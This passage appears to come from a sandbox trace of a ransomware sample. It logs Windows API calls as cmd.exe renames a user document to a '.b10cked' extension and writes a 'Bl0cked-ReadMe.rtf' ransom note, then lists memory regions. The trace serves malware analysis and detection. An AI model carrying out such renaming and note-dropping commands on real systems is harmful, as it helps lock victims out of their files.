Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ebcc | out: phkResult=0x16ebcc*=0x40) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x0, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x9, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x9, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x9, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegCloseKey (hKey=0x40) returned 0x0 [0140.672] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.672] srand (_Seed=0x5b88636f) [0140.672] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"" [0140.672] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"" [0140.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.673] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.673] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.673] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.673] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.673] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.673] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.673] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.673] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.673] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.673] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.673] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.673] GetEnvironmentStringsW () returned 0x2e2328* [0140.674] FreeEnvironmentStringsW (penv=0x2e2328) returned 1 [0140.674] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.674] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.674] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.674] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.674] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.674] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.674] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.674] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.674] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.674] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.674] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f998 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f998, lpFilePart=0x16f994 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f994*="Desktop") returned 0x18 [0140.674] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.674] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f714 | out: lpFindFileData=0x16f714) returned 0x2e0068 [0140.674] FindClose (in: hFindFile=0x2e0068 | out: hFindFile=0x2e0068) returned 1 [0140.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f714 | out: lpFindFileData=0x16f714) returned 0x2e0068 [0140.675] FindClose (in: hFindFile=0x2e0068 | out: hFindFile=0x2e0068) returned 1 [0140.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f714 | out: lpFindFileData=0x16f714) returned 0x2e0068 [0140.675] FindClose (in: hFindFile=0x2e0068 | out: hFindFile=0x2e0068) returned 1 [0140.675] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.675] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.675] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.675] GetEnvironmentStringsW () returned 0x2e2b48* [0140.675] FreeEnvironmentStringsW (penv=0x2e2b48) returned 1 [0140.675] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.676] GetConsoleOutputCP () returned 0x1b5 [0140.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.676] GetUserDefaultLCID () returned 0x409 [0140.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fad8, cchData=128 | out: lpLCData="0") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fad8, cchData=128 | out: lpLCData="0") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fad8, cchData=128 | out: lpLCData="1") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.677] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.678] GetConsoleTitleW (in: lpConsoleTitle=0x2d0918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.678] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.678] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.678] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.679] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.679] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.679] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.679] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.679] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.679] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.679] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.683] GetConsoleTitleW (in: lpConsoleTitle=0x16f7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.043] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.043] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.043] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.043] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.043] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.043] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.043] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.043] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.043] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.043] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.043] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.043] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.043] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.043] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.045] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f58c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f584, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f584*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.047] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.047] _wcsicmp (_String1="BDJO8C~1.DOC", _String2=".") returned 52 [0141.047] _wcsicmp (_String1="BDJO8C~1.DOC", _String2="..") returned 52 [0141.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8c~1.doc")) returned 0x20 [0141.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1ed0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.047] SetErrorMode (uMode=0x0) returned 0x0 [0141.047] SetErrorMode (uMode=0x1) returned 0x0 [0141.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", nBufferLength=0x104, lpBuffer=0x16ef14, lpFilePart=0x16eefc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", lpFilePart=0x16eefc*="BDJO8C~1.DOC") returned 0x34 [0141.047] SetErrorMode (uMode=0x0) returned 0x1 [0141.048] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0141.048] _wcsicmp (_String1="BDJO8C~1.DOC", _String2=".") returned 52 [0141.048] _wcsicmp (_String1="BDJO8C~1.DOC", _String2="..") returned 52 [0141.048] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8c~1.doc")) returned 0x20 [0141.048] SetErrorMode (uMode=0x0) returned 0x0 [0141.048] SetErrorMode (uMode=0x1) returned 0x0 [0141.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", nBufferLength=0x104, lpBuffer=0x16f390, lpFilePart=0x16f128 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", lpFilePart=0x16f128*="BDJO8C~1.DOC") returned 0x34 [0141.048] SetErrorMode (uMode=0x0) returned 0x1 [0141.049] SetErrorMode (uMode=0x0) returned 0x0 [0141.049] SetErrorMode (uMode=0x1) returned 0x0 [0141.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", nBufferLength=0x104, lpBuffer=0x16f598, lpFilePart=0x16f128 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", lpFilePart=0x16f128*="bDJO8cWgfh9q_unjpPU-.doc.b10cked") returned 0x48 [0141.049] SetErrorMode (uMode=0x0) returned 0x1 [0141.049] SetLastError (dwErrCode=0x0) [0141.049] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc.b10cked")) returned 0xffffffff [0141.049] GetLastError () returned 0x2 [0141.049] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x16eaa4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eaa4) returned 0x2d0f50 [0141.049] FindNextFileW (in: hFindFile=0x2d0f50, lpFindFileData=0x16eaa4 | out: lpFindFileData=0x16eaa4) returned 0 [0141.050] GetLastError () returned 0x12 [0141.050] FindClose (in: hFindFile=0x2d0f50 | out: hFindFile=0x2d0f50) returned 1 [0141.051] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x2e1c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1c70) returned 0x2d0f50 [0141.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", nBufferLength=0x104, lpBuffer=0x16ed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", lpFilePart=0x0) returned 0x48 [0141.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc", nBufferLength=0x104, lpBuffer=0x16ed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc", lpFilePart=0x0) returned 0x40 [0141.051] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc")) returned 0x20 [0141.052] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc.b10cked"), dwFlags=0x3) returned 1 [0141.052] FindClose (in: hFindFile=0x2d0f50 | out: hFindFile=0x2d0f50) returned 1 [0141.052] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ecf0 | out: _Buffer=" 1") returned 9 [0141.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.052] GetFileType (hFile=0x7) returned 0x2 [0141.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.053] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ec7c | out: lpMode=0x16ec7c) returned 1 [0141.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecb0 | out: lpConsoleScreenBufferInfo=0x16ecb0) returned 1 [0141.053] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0141.054] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ecf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0141.054] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ecd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ecd4*=0x1a) returned 1 [0141.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.054] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.054] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.055] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.055] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.055] SetConsoleInputExeNameW () returned 0x1 [0141.055] GetConsoleOutputCP () returned 0x1b5 [0141.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.055] exit (_Code=0) Process: id = "152" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14576 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14577 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14578 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14579 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14580 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14581 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14582 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14583 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14584 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14585 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 